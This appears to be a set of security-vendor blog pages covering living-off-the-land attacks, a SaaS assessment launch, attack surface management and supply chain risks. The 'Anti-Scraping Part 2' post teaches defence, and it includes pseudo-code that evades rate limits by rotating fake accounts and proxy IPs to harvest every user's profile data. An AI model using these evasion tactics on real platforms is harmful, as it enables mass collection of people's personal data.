Back

eSecurity Planet: Living Off the Land Attacks: LOTL Definition & Prevention

NetSPI Principal Consultant Derek Wilson is featured in eSecurity Planet, sharing insights on Living Off the Land (LOTL) attacks and how to prevent them. Read the preview below or find the full article at https://www.esecurityplanet.com/networks/living-off-the-land-attacks/.

+++

5 Best Practices for Preventing LOTL Attacks

The following strategies help your business not only prepare for LOTL attacks but also reduce threat actors’ opportunities to compromise your legitimate systems.

Use LOLBINS To Track Binary Activity

The Living off the Land Binaries, Scripts, and Libraries project (LOLBAS) offers a comprehensive list of exploits attackers use. It’s best to study one binary (LOLBIN) at a time, examining how the specific program is typically used. Once your team knows what appropriate usage looks like, you can begin identifying abnormal behavior from that program.

Derek Wilson, principal consultant at security firm NetSPI, underscored the importance of using this resource. “By finding a way to baseline detections against something like the Living Off the Land Binaries And Scripts (LOLBAS) project, which is set up to track LOTL threats, teams can then build proactive detection plans for the procedures that aren’t caught,” he said.

Wilson recommended additional software to help teams develop general detection methods. “Breach and attack simulation (BAS) tools are invaluable in baselining detective controls and continuously improving detection of LOTL attacks,” he said. BAS tools give security teams insight into an attack lifecycle, behaving like a threat actor might to find security weaknesses more quickly.

You can read the full article here!

Back

NetSPI Launches Software as a Service (SaaS) Security Assessment

Offensive security leader brings proactive security to Microsoft 365 and Salesforce environments, supporting discovery and remediation of SaaS vulnerabilities and misconfigurations.

Minneapolis, MN – July 25, 2023 — NetSPI, the global leader in offensive security, today unveiled its Software as a Service (SaaS) Security Assessment, bringing proactive security to Microsoft 365 and Salesforce environments. NetSPI’s SaaS Security Assessment leverages both automated and manual testing methods developed from years of industry-leading application and cloud assessments to discover and help remediate vulnerabilities and misconfigurations.  

SaaS applications play a critical role in attack surface expansion as businesses continue to increasingly depend on them for critical operations and data management. Yet, 81% of organizations have sensitive SaaS data exposed. Delivered on NetSPI’s Penetration Testing as a Service (PTaaS) platform, the SaaS Security Assessments include real-time reporting, remediation guidance, project management and communication, as well as the ability to track data and discover vulnerability trends.  

“SaaS security is imperative, but it’s often overlooked due to organizations’ false assumption that SaaS vendors will protect customer data and app usage – creating a major blind spot for security teams, and increased opportunity for malicious actors,” said Karl Fosaaen, Vice President of Research at NetSPI. “As the attack surface continues to evolve and expand, protecting SaaS apps must become an integral part of businesses’ security strategy. Our application and cloud pentesting expertise puts us ahead of the curve and brings unparalleled insights to the SaaS security market at a time when it’s needed most.” 

NetSPI’s SaaS Security Assessment addresses: 

  • Identity & Access Management – Ensuring only authorized users have access to SaaS applications 
  • Data Management – Protecting every form of data in an organization’s possession 
  • Data Storage – Protecting where data is stored 
  • Email Security – Protecting applications from unauthorized access through email account attack vectors
  • Account Protection – Maintaining account integrity and confidentiality 
  • Password Security – Ensuring password policies follow industry best practices 
  • Integrations – Validating the security of third-party integrations 

The service is currently being offered for Salesforce and Microsoft 365 in accordance with industry standards such as CIS Benchmarks, with additional security checks derived from NetSPI’s extensive experience in testing these environments. 

To learn more about NetSPI’s SaaS Security Assessments, or its comprehensive offensive security solutions, please visit www.netspi.com

About NetSPI

NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 

Back

How to Select the Best Attack Surface Management Platform 

As companies’ attack surfaces continue to expand and threat actors remain relentless, attack surface management (ASM) has grown to a rapidly emerging category in the cybersecurity space. Rather than organizations manually inventorying and protecting critical assets on their own, attack surface management tools provide continuous visibility and risk assessment of a company’s entire attack surface. 

Teams looking to improve their offensive security efforts have many attack surface management tools to choose from, but most only provide standard asset discovery – such as the use of off-the-shelf scanners – and lack prioritization of actionable remediation efforts, resulting in alert overload. 

We asked our team of attack surface management experts for their thoughts on which features security leaders should look for in ASM platforms to ensure they’re getting the best value and highest level of protection. The most effective attack surface management tools go beyond asset discovery by adding expert human analysis to prioritize alerts and remediation.

ASM Freemium Scan Tool

6 Must-Have Features in an Attack Surface Management Platform 

As you weigh the pros and cons of various attack surface management platforms and tools, consider the following must-have features. 

1. Ability to Comprehensively Discover the Unknown  

Many attack surface management tools may only have the capabilities to discover known assets, such as IP addresses, domains, software, and other assets that the security team actively manages. However, finding and securing both known and unknown internet-facing assets  is an essential capability for attack surface management tools.  

Unknown assets may include those that lack awareness from the IT security team, unauthorized and unmanaged assets. There are a variety of causes for these gaps in known assets including shadow IT, misconfigurations, failed decommissions, and more. These gaps ultimately result in ineffective scan coverage and scopes for pentests, thus leaving your attack surface unmonitored and presenting a risk to your organization. 

When you leverage an attack surface management platform like NetSPI, ASM engagements start with a list of known domains and IPs. Next, the search expands to related entities to uncover all assets tied to a company – including unknown assets. The Dynamic FAQs feature in NetSPI’s attack surface management platform shows how many IPs were initially provided, compared to how many public-facing assets were found.  

2. Inclusion of Human Analysis to Prioritize Alerts  

Our 2023 Offensive Security Vision Report showed that a lack of resources and prioritization are two of the top barriers to greater offensive security. Helping security teams with data-driven prioritization of remediation efforts eases the burden of decision-making. 

Expert human analysis delivers the strongest cybersecurity results because pentesters provide context into alerts, which results in only alerting on high-impact vulnerabilities. Attack surface management tools that incorporate human analysis can leverage the team’s expertise to vet vulnerabilities before they’re added as alerts. 

Manual pentesters review every exposure to contextualize it and determine whether they’re exploitable. This helps eliminate alert fatigue, drastically reduces the amount of work teams need to do, and enables teams to focus on meaningful remediation efforts.  

As an example of this approach in practice, NetSPI addresses this with a Signal Dashboard to distill signal from noise. This dashboard highlights all the activities of the ASM Operations Team, so clients can understand what’s happening behind the scenes even if they haven’t been alerted to new vulnerabilities in a while.

Signal Dashboard in NetSPI's PTaaS Platform, Resolve
In this ASM Signal Dashboard screenshot, it shows that NetSPI ASM Operations team has reviewed 1.21k assets, discovered 6.71k new assets, reviewed 1 vulnerability, and determined that of this there is no action needed by the client’s team, eliminating all work they would have done to discover, validate, or remediate.

3. Ability to Track Attack Surface Changes Over Time 

A key benefit of attack surface management is discovering attack surfaces that were previously unknown. A traditional approach to tracking attack surfaces has been manually tracking externally facing assets. However, because attack surfaces and threats can evolve and expand overnight, this approach isn’t enough to track changes and secure new attack surfaces that emerge throughout the year. 

Rather than only performing annual pentesting, relying on a combination of external network penetration testing and comprehensive, continuous attack surface management enables organizations to track expanding attack surfaces and find vulnerabilities as they arise. 

With the right attack surface management platform, once the initial report is complete and critical vulnerabilities have been addressed, the attack surface management platform performs regular evaluations of a company’s entire attack surface on an ongoing basis.  

This inventories new attack surfaces as they arise and shows all data in one user-friendly platform. 

4. Expertise to Develop New Features In-House Based on Customer Priorities 

As cyber threats evolve and persist, security solutions also need to adapt to protect against the latest attacks and align with customers’ business needs. Working with customers is a two-way street for ASM vendors to advance technology capabilities.

The best attack surface management platform provider will listen to customers to help drive feature development and platform enhancements. Based on input from customers, a team of software engineers has the capability to update and build new features in-house.

ASM Company Hierarchy
With NetSPI as an example, we released a Company Hierarchy Dashboard on our Attack Surface Management platform, a feature that was driven in part by customer requests. The dashboard visualizes the entire company, including all subsidiaries, divisions, and acquisitions on one screen. It’s especially helpful for organizations who use ASM to get ahead of potential vulnerabilities that may come with mergers and acquisitions. Learn more about this dashboard on LinkedIn here.

When you work with NetSPI, you get incredible value through our technology and expert team, but one of the greatest benefits is that we are continually improving our platform to add more value every time you log in. Interested in learning more about our latest updates? Read our release notes.

5. A Clean, Easy-to-Use UX 

As is the case with any product, software, or platform, attack surface management end users won’t settle for poor user experience (UX) or a clunky product with too many clicks to get to a destination. User-friendly design, easy to digest dashboards, and training materials at the ready are essential for the best attack surface management tools. Some platforms even have dark mode to meet anyone’s preferences.   

Features and capabilities that go beyond attack surface management and into related market categories are beneficial for organizations to continue evolving and advancing their offensive security strategies.  

Additional capabilities to look for in an attack surface management platform include but aren’t limited to:  

Partnering with a vendor like NetSPI that offers services such as these can help ensure you’re backed with the right mix of offensive security methods for your business.

Gartner Related Categories to ASM
See Gartner’s matrix from the report “Competitive Landscape: External Attack Surface Management” on related service areas to attack surface management.

Access the Most Important Attack Surface Management Features with NetSPI   

Asset discovery with attack surface management is table stakes and the right vendors go far beyond this approach to provide the best possible offensive security solutions.

NetSPI’s attack surface management platform and solutions include human analysis to prioritize alerts, the ability to discover the unknown and track attack surfaces changes over time, capabilities to develop new features in-house, a user-friendly experience, and additional security services that go beyond ASM. 

Want to hear about ASM from a third party? Gartner® provides recommendations on vendor capabilities in the report, Competitive Landscape: External Attack Surface Management. Take a look and then try our free Attack Surface Management Tool to search more than 800 million public records for potential attack surface exposures. 

ASM In Action: NetSPI’s Attack Surface Management Demo
Back

Discover the Unknown with ASM Security for Attack Surface Reduction

As businesses scale, the number of employees, assets, and platforms continuously expand, giving adversaries many pathways to gain entry to networks and environments. To mitigate risks as the world becomes increasingly connected, prioritizing attack surface reduction is critical.

Attack surface management (ASM) results in attack surface reduction because it identifies unknown or vulnerable parts of an attack surface allowing security teams to address these risks. Attack surface reduction, when aligned with business needs, decreases opportunities for threat actors to find and exploit an unmanaged or weak asset while enabling the business to grow securely. 

Gain a Shared Understanding of Assets versus Exposures 

According to Forrester, attack surface management is defined as, “the process of continuously discovering, identifying, inventorying, and assessing the exposures of an entity’s IT asset estate.” Recognizing the difference between assets and exposures is an important part of ASM security.

Assets include IP addresses, domains, ASNs, and cloud accounts. When assets are unmanaged or unknown, they are a more susceptible target and at a higher risk for vulnerabilities.  

Exposures are risks that exist on assets and can also pose a cybersecurity risk for organizations. Exposures include open ports, SSL certificates, and vulnerabilities. 

The Difference Between Known versus Unknown Assets  

As businesses grow and adapt to change, their attack surface grows as well. Without proper asset tracking, this can increase the number of unknown external assets. 

Understanding the difference between known versus unknown assets, also sometimes referred to as managed versus unmanaged assets, can improve attack surface reduction. Known assets include IP addresses, domains, cloud accounts, ASNs, and other assets that the IT security team is aware of and actively manages. 

On the other hand, unknown assets include those that are unauthorized or unmanaged by the IT department, and thus can pose a significant risk to the business. Some challenges related to unknown assets include:  

  1. Shadow IT: Access to or use of technology, hardware, or software that is outside an organization’s security governance processes and unknown by the IT department—known as shadow IT—can lead to vulnerabilities and exposures. Examples of shadow IT include sharing work files to personal drives, email addresses, or cloud storage accounts.  
  2. Misconfigurations: Security teams are unable to accurately detect misconfigurations and other weaknesses present in unknown assets, which increases the risk of breaches and other attacks.  
  3. Ineffective scan coverage: When assets are unknown, organizations can’t effectively prioritize scan results to detect and remediate vulnerabilities.  

3 Tactics to Support Attack Surface Reduction with ASM Security 

1. Prioritize attack surface mapping  

Attack surface mapping is part of any strong ASM security strategy and refers to identifying all assets and the total scope of an organization’s attack surface, as well as potential exposures, and a plan to prioritize and remediate risks. Mapping involves continuous attack surface discovery, which inventories all existing attack surfaces including both known and unknown assets.

With a full understanding of the total attack surface scope, an organization can perform an attack surface assessment, which scans known business domains and IP addresses to identify threats and vulnerabilities. The key to effective attack surface assessments is pairing data analysis with expert human evaluation to ensure alerts are prioritized based on the overall risk to an organization.  

2. Continuously manage attack surfaces 

With traditional approaches to cybersecurity, many organizations complete manual penetration testing once or a few times a year to keep up with compliance regulations. However, new external assets can come into ownership overnight, and threat actors are increasingly sophisticated in their methods of attack, meaning an annual pentest, while valuable, isn’t enough to protect against emerging threats.  

Instead, ASM security that includes continuous monitoring and evaluation keeps attack surface sprawl in check and helps organizations avoid giving adversaries the opportunity to find new attack surfaces and risky exposures. Assessing and managing your attack surface, including new cloud assets, on a consistent basis using a combination of external network penetration testing and an attack surface management platform, can help your team stay ahead of the latest threats. 

ASM In Action: NetSPI’s Attack Surface Management Demo

3. Deactivate unused assets or attack surfaces 

Unused assets unnecessarily expand attack surface sprawl, increasing the number of assets that can fall victim to vulnerabilities. Examples of unused assets may include infrastructure that was scheduled for decommission but never was decommissions, untracked asset remnants from mergers and acquisitions, and assets that are no longer actively used for example.

To achieve attack surface reduction, partner closely with a cybersecurity team or attack surface management vendor to evaluate assets or attack surfaces that can be deactivated.  

Improve ASM Security with NetSPI’s Free Attack Surface Management Tool  

Comprehensive ASM security can help your business identify and manage attack surfaces to improve attack surface reduction. To ensure your ASM security is as effective as possible, leverage an attack surface management platform like NetSPI, which pairs human expertise with advanced software and data analysis. This helps your business prioritize the results of attack surface management analysis for the highest level of protection and best ROI on cybersecurity investments. 

Test drive NetSPI’s free attack surface management tool to detect and protect both known and unknown assets. After all, you can’t manage assets you don’t know about. Test NetSPI’s ASM tool for free!  

Back

Anti-Scraping Part 2: Implementing Protections

Continuing our series on Anti-Scraping techniques, this blog covers implementation of Anti-Scraping protections in a fake message board and examination of how scrapers can adapt to these changes.

While completely preventing scraping is likely impossible, implementing a defense in depth strategy can significantly increase the time and effort required to scrape an application. Give the first blog in this series a read, Anti-Scraping Part 1: Core Principles to Deter Scraping, and then continue on with how implementing these core principles affects scrapers’ ability to exfiltrate data.

Hardening the Application

Multiple changes have been made to the Fake Message Board site to try and prevent scraping. The first major change is that rate limiting has been enforced throughout the application. Previously, the search bar had a “limit” parameter with no maximum enforced value which allowed all users of the application to be scraped in only a few requests. Now the “limit” parameter has a maximum enforced value of 100. All error messages have been converted to generic messages that do not leak information. 

Not all the recommended changes have been applied to the application. Account creation has still not been locked down. Additionally, the /search endpoint still does not require authentication. As illustrated in “The Scraper’s Response” section, these gaps undermine most of the “fixes” made to the application. 

Implementing Rate Limiting 

There are many design decisions that need to be made when implementing rate limits. Here are some of the considerations: 

  1. Should rate limits be specific to endpoints or constant across the application? 
  2. How many requests should be allowed per unit of time? (ex: 100 requests/second) 
  3. What are the consequences of reaching a rate limit?

Additionally, there is a distinction between logged-in and logged-out rate limits. Logged-in rate limits are applied to user sessions. When scrapers create fake accounts and use them for scraping, logged-in rate limits can suspend or block those accounts. If creating fake accounts is difficult, then this can significantly hinder a scraper’s progress. Logged-out rate limits are applied to endpoints where having an account isn’t required. From a defensive perspective, there are limited signals that can be used when a scraper is logged-out. The most common signal is an IP address. There are additional signals such as user-agent, cookies, additional HTTP headers, and even TCP fields. In the next sections we’ll review how the Fake Message Board application implemented both logged-in and logged-out rate limits. 

Logged-in Rate Limits

In this case the logged-in rate limits are applied across the application. This probably isn’t the best decision for most organizations, but it is the easiest to implement. Each user is allowed to send 1000 requests/minute, 5000 requests/hour, and 10,000 requests/day. If a user violates any of those rate limits, then they receive a strike. If a user receives 3 strikes, then they are blocked from the platform. Implementing an unforgiving strategy like this is probably too strict for most applications.  

Determining the number of requests allowed per unit of time is a very difficult problem. The last thing we want is to impact legitimate users of the application. Analyzing traffic logs to see how many requests the average user is sending will be critical to this process. When viewing the users sending the most traffic, it may be difficult to distinguish authentic traffic from user’s misusing the platform via automation. This will more than likely require manual investigations and extensive testing in pre-production environments.  

It is also worth noting that bugs in applications can result in requests being repeatedly sent on the user’s behalf without their knowledge. Punishing these users with rate limits would be a huge mistake. If a user is sending a large number of requests to the same endpoint and the data returned isn’t changing, then it seems more likely that this is a bug in the application as opposed to scraping behavior.

Logged-out Rate Limits

In this case the logged-out rate limits are also applied across the application. Each IP address is allowed to send 1000 requests/minute, 5000 requests/hour, and 10,000 requests/day. If an IP address violates any of those rate limits, then it receives a strike. If the IP receives 3 strikes, then it’s blocked from the platform. This isn’t a realistic solution for multiple reasons, but the primary is that some IP addresses can be used by multiple users such as public WiFi IPs or university IPs. In those cases, the IPs would be blocked unfairly. 

One of the main weaknesses of logged-out rate limits is that almost every signal can be controlled by the scraper. For example, the scraper can change their user agent with every request. If that signal is used in isolation, then you’ll just see a small number of requests from a bunch of different user agents. Similarly, a scraper can rotate their IP address. This is a devastating technique from a defensive perspective because our most reliable signal is the IP address. There are multiple open source libraries that make rotating IP addresses trivial. Implementing effective logged-out rate limits will probably require combining multiple of the mentioned signals in sophisticated ways.

Enforcing Data Limits 

Ensuring that there’s a maximum limit to the amount of data that can be returned per response is a crucial piece in the fight against scraping. Previously, the search bar had a “limit” parameter which could return hundreds of thousands of users in one response. Now only up to 100 users can be returned per response. If more than 100 users are requested, then an error message is returned as shown below. 

HTTP Request:

POST /search?limit=101 HTTP/1.1
Host: 127.0.0.1:12345
[TRUNCATED] 

{"input":"t"}

HTTP Response:

HTTP/1.0 400 Bad Request 
[TRUNCATED] 

{"error":"error"}

Return Generic Error Messages 

Previously the forgot password and create account workflows leaked information useful to scrapers via error messages. The forgot password workflow used to reveal whether the provided username matched an existing account and would return the email address if it did. Now it always returns the same message, “If the account exists an email has been sent.” 

HTTP Request:

POST /forgotPassword HTTP/1.1
Host: 127.0.0.1:12345 
[TRUNCATED]

username=doesnotexist

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"message":"if the account exists an email has been sent"}

The create account workflow used to reveal whether a specific username, email address, or phone number was already taken. Now it always returns the message, “If the account was created an email has been sent.” 

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=vfoster166&email=test@test.com&phone=&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"if the account was created an email has been sent"}

The Scraper’s Response 

Since the application has been updated, let’s review each piece of functionality and figure out how we can bypass the protections: 

  1. Recommended Posts Functionality: Requires authentication, and rate limits your account after 1,000 requests.  
  2. Search Bar: Does not require authentication, returns 100 users/response, and rate limits your IP address after 1,000 requests. 
  3. User Profile Pages: Requires authentication and rate limits your account after 1,000 requests. 
  4. Account Creation: No longer useful for leaking data, but fake accounts can be made easily. 
  5. Forgot Password: No longer useful for leaking data.

Overall, the application has had multiple improvements since the previous scrape in Part 1. The introduction of rate limits forces us to adapt our techniques. For Logged-In scraping the tactic will be to rotate sessions. Since we’re able to easily make many fake accounts, we will send a small number of requests from each account and as a result never get rate limited. For Logged-out scraping the tactic will be to rotate IP addresses. By only sending a few requests from each IP address we will hopefully never get rate limited.

Logged-In Scraping 

The goal is to extract all 500,000 users using either the recommended posts functionality or user profile pages. Since user profile pages return more data about the user (ID, name, username, email, birthday, phone number, posts, etc…) let’s focus on that endpoint. Assuming we only get one user per response, each of our fake accounts can send 999 requests/minute without being rate limited. If we make 500 fake accounts, then each account will only have to send ~999 requests in order to scrape every user on the platform. This means in only a couple minutes every user can be scraped and no rate limiting will be encountered. 

Pseudo Scraper Code:

user_id_counter = 1  # User IDs start at 1 and are sequential 
fake_accounts = [session1, session2, …, session500]  # make a list with session                  cookies for all the fake accounts 

while(user_id_counter < 500,000):  # go through all 500,000 users 
    for session in fake_accounts:  # rotate your session 
        user_data = requests.get(“/profile/” + str(user_id_counter)) 
        user_id_counter += 1

Logged-Out Scraping 

Extracting all 500,000 users using the search functionality is not as easy as it was last time. Now only 100 users are returned per response. Since each IP address can send 999 requests/minute without being rate limited, each IP can scrape 99,900 users without being blocked. This means only a few IP addresses are required. Most IP rotation tools leverage tens of thousands of IPs so getting a few is not an issue. 

Pseudo Scraper Code:

while(users_scraped < 500,000): 
    user_data = requests.get(“/search?limit=100”, data=random_search_string, proxy=Some IP rotation service) 

Summary

With multiple protections in place, scraping all 500,000 fake users of the application in a few minutes is still pretty easy. As a quick recap, the five core principles of scraping in our view are: 

  1. Require Authentication 
  2. Enforce Rate Limits 
  3. Lock Down Account Creation 
  4. Enforce Data Limits 
  5. Return Generic Error Messages

As demonstrated in this blog, failing to implement one of these principles can completely undermine protections implemented in the others. Although this application enforced rate limits, data limits, and returned generic error messages, by not enforcing authentication and by allowing fake accounts to easily be created, the other protections barely hindered the scraper. 

Additional Protections

There are several additional Anti-Scraping techniques that are worth bringing to your attention before wrapping up.  

  • When locking down account creation, implementing CAPTCHAs is a critical step in the right direction.  
  • Requiring the user to provide a phone number can be a gigantic annoyance to scrapers. If there’s a limit on the number of accounts per phone number, and virtual phone numbers are blocked, then it’s much more difficult to create fake accounts at scale. 
  • If user data is being returned in HTML, then adding randomness to the responses is another great deterrent. By changing the number and type of HTML tags around the user data, without affecting the UI, it becomes significantly harder to parse the data. 
  • On the rate limiting front, make sure to apply rate limits to the user as opposed to the user’s session. If rate limits are applied to the session, then a scraper can just log out and log back in which grants them a new session and thus bypasses the rate limit.  
  • For logged-out rate limits blocking certain IP ranges such as TOR IPs, or proxy/VPN providers may make a lot of sense especially if the majority of the traffic is inauthentic. Each organization with ranges of IP addresses will be assigned autonomous system numbers (ASNs). There are several publicly available ASN -> IP range tools/APIs that may be very useful in these cases.
  • Lastly, user IDs should not be generated sequentially. A lot of scrapes first require a list of user IDs. If they are hard to guess and there isn’t an easy way to collect a large list of them then this can also significantly slow down a scraper. 

Conclusion 

Hopefully some of the Anti-Scraping tactics and techniques shared in this series were useful to you. Although completely preventing scraping probably isn’t possible, implementing a defense in depth approach which follows our five core principles of Anti-Scraping will go a long way in deterring and wasting time of scrapers. 

Back

3 Software Supply Chain Risks in 2023

Over the last two years, the software supply chain has become one of the most pressing and relevant security issues for organisations. In 2022, the number and severity of the attacks increased with no signs of slowing down. The majority of these attacks fell into one of three categories: package manager attacks, developer compromise, or large software vendor breaches. In this post, we will explore each of these and how you can defend against them. 

Package Managers 

Package managers have been of increasing interest for hackers over the past few years with attacks against the packages fundamental to so much of our software. Not only this, but there has been an upward trend of attacks against the managers themselves. The managers such as PyPI, Maven and the most popular npm’s track record of security leaves a lot to be desired. Research like dependency confusion showed how they could be leveraged to attack some of the largest organisations in the world. 

ReversingLabs, a company focused on threat hunting and supply chain security have released a report, specifically looking at attacks against package management software. They have seen a continual increase of known vulnerabilities in this software, up nearly 300% in the last four years. This includes attacks where malicious packages could masquerade as reputable ones, and attacks against additional security measures such as MFA. See aqua’s articles on the subject:  

Npm in particular seems to be a target for attackers, given it is by far the largest package manager with over 1.3 million packages. Nearly 7000 packages in npm were identified as malicious in 2022, up from nearly 5000 in 2021. These malicious packages often exploit human error to be installed via typosquatting. This extremely simple technique has shown that supply chain attacks are not exclusive to advanced hacker groups, but also bored teenagers as well. 

What can be done to reduce the risk of package managers? The responsibility lies both with organisations and the repositories themselves. 

A double-edged sword with package managers is the lack of vetting. Anyone can create a package, which means we can draw on the amazing pool of developers from around the world. But this also means threat actors can create and distribute their malicious code. None of the top five package managers review their code, but the sheer size of the managers means that going to a review system would be complex, expensive and slow. This article by duncanlock has done the math, Supply Chain Attacks & Package Managers – a Solution? 

If Debian (the largest vetted repository) needs 240 maintainers, something on the scale of PyPi (only the third largest repository) would need nearly 1000. This opens the door for actors to target unvetted package managers with the assurance they are unlikely to be caught. 

An alternative may be for an organisation to vet their own libraries and take them offline. This will combat legitimate packages turned malicious, or any accidental imports that could lead to typosquatting attacks. As with anything, there are some drawbacks. Development time may be slowed, and the vetting will cost money. A reasonable first step would be to use private repositories and then look to vet the libraries from most to least critical to your development. 

For certain software products in your inventory, it can be difficult to know their secure development practices and you may be greatly increasing your risk of compromise via a third party. To combat this, some organisations will provide a software bill of materials. This should be a list of all software components used in a software product, making it easier to understand your attack surface and manage it accordingly.

ASM Freemium Scan Tool

Developers 

One of the most vulnerable elements of the supply chain is developers. As we saw with typosquatting, human error is often the entry point for attacks. Some developers also implement little to no security best practice, understandably because they create and maintain packages in their spare time as a hobby. There also may only be a single developer hosting hundreds of packages that have millions of downloads. This single point of failure quickly becomes a prime target in supply chain attacks. 

Developer bad practice led to numerous compromised libraries in 2022. One such example affected three million users after a developer let a domain hosting a library expire and a deleted username was quickly taken by an attacker and then was allowed to make changes to the library. Both of these attacks were unofficially attributed to a university student, perfectly illustrating that supply chain attacks are no longer exclusive to nation state groups (as with SolarWinds). 

Sometimes, the developers themselves may turn malicious. There have been recent incidents of disgruntled developers disrupting the supply chain. A “hacktivist” developer recently corrupted two projects they owned: faker.js and color.js. These had 2.5 million and 22.4 million weekly downloads respectively. This example perfectly outlines the inherent risk with using and relying on third-party code. 

The responsibility does not entirely fall on the developers — the package managers and code repositories also share it. A lot of these attacks may have been prevented by using MFA, shockingly something that wasn’t enforced for “critical” developer accounts. However, the likes of Github have begun to implement security decisions on behalf of the developers like enforcing MFA for important developer accounts. 

Preventing developer-centric issues will involve the package managers and repositories enforcing more security measures on behalf of the developers. While it may not be possible to vet each package, ones that are integral to thousands of software projects should be reviewed for malicious code or significant changes to the functionality. 

Large Software Vendors 

The exploitation of SolarWinds in 2020 by the Russian government first brought supply chain security onto centre stage. Hundreds of organisations were compromised in what is considered one of the most successful attacks in history. Since then, the supply chain attacks have gotten creative against package managers and developers. But the level of access and the outreach of targeting the likes of SolarWinds remains extremely popular, especially with advanced hacking groups. 

Most recently we have seen the Okta and Twilio breaches. Okta (a supplier of identity and access management) were breached by the group Lapsus$ and over 350 of their corporate customers were affected as part of the breach. The breach itself was caused by a third-party service provider (supply chain-ception?), showing how nested the supply chain has become. Twilio’s breach affected its authentication service authy, which subsequently affected 125 Twilio customers. The breach was part of a phishing attack 0ktapus, named due targeting Okta customers via phishing attacks. 

Back in 2021 the Log4Shell vulnerability had the cybersecurity industry scrambling. Due to the immense effort of so many people, mass exploitation was avoided. However, the aftershocks of the vulnerability were felt in 2022, no more so than in the exploitation of VMware Horizon. This product enables virtual desktops and applications and is used by thousands of large organisations. Attackers leveraged the exploit in Horizon to target Microsoft, the UK’s NHS, CrowdStrike and more. 

These more complex and advanced attacks are important to prevent for many organisations, as the software can form an integral part of a company’s business. Instead, companies can take steps to slow down the attackers and mitigate any meaningful malicious actions from occurring.  

We need a paradigm shift from standard perimeter-based networks, where everything internal is considered a trusted asset to more of a Zero Trust architecture. This is a long arduous process, but many security steps aid the process such as network segmentation, endpoint detection and gaining a full understanding of the attack surface. This shift is a topic I’m passionate about, and I had the chance to contribute to CyberWire Pro on a related incident: the implications of the recent MOVEit exploitation for software supply chain security.  

“…There is not a single responsible party for the supply chain, it’s down to the vendors, the repositories, the software consumers and the developers. The second half of 2023 should be when we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way.” 

Read the full quote here.
Cyberwire MOVEit

To reduce the likelihood of any one third party being compromised, an organisation should attempt to minimise the attack surface and reliance on the supply chain. It is becoming common practice to hand off security to a vendor but no one is going to care more about your security and your data than you. The more control you have in your systems, the better placed you are to identify threats in the supply chain and also any other parts of your systems. 

Conclusion 

2022 brought an increase of supply chain attacks across the board, with many of these attacks being by less sophisticated actors at much broader scales. The supply chain looks more like a web and it’s more difficult than ever to fully understand what risks you bring in through your third-party vendors. 

But there is hope. Organisations are now seeing the risks of the supply chain clearly and beginning to take action. There is not a single responsible party for the supply chain — it’s down to the vendors, the repositories, the software consumers and the developers. 2023 should be the year we see meaningful progress by all parties involved to control the supply chain and ensure it can be used in a secure way. 

NetSPI’s team of offensive security specialists can help! Our Attack Surface Management solution gives security teams insight into their attack surface, and helps monitor changes, validate vulnerabilities, and prioritize remediation efforts.  

See Attack Surface Management in action with this on-demand demo

ASM In Action: NetSPI’s Attack Surface Management Demo

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X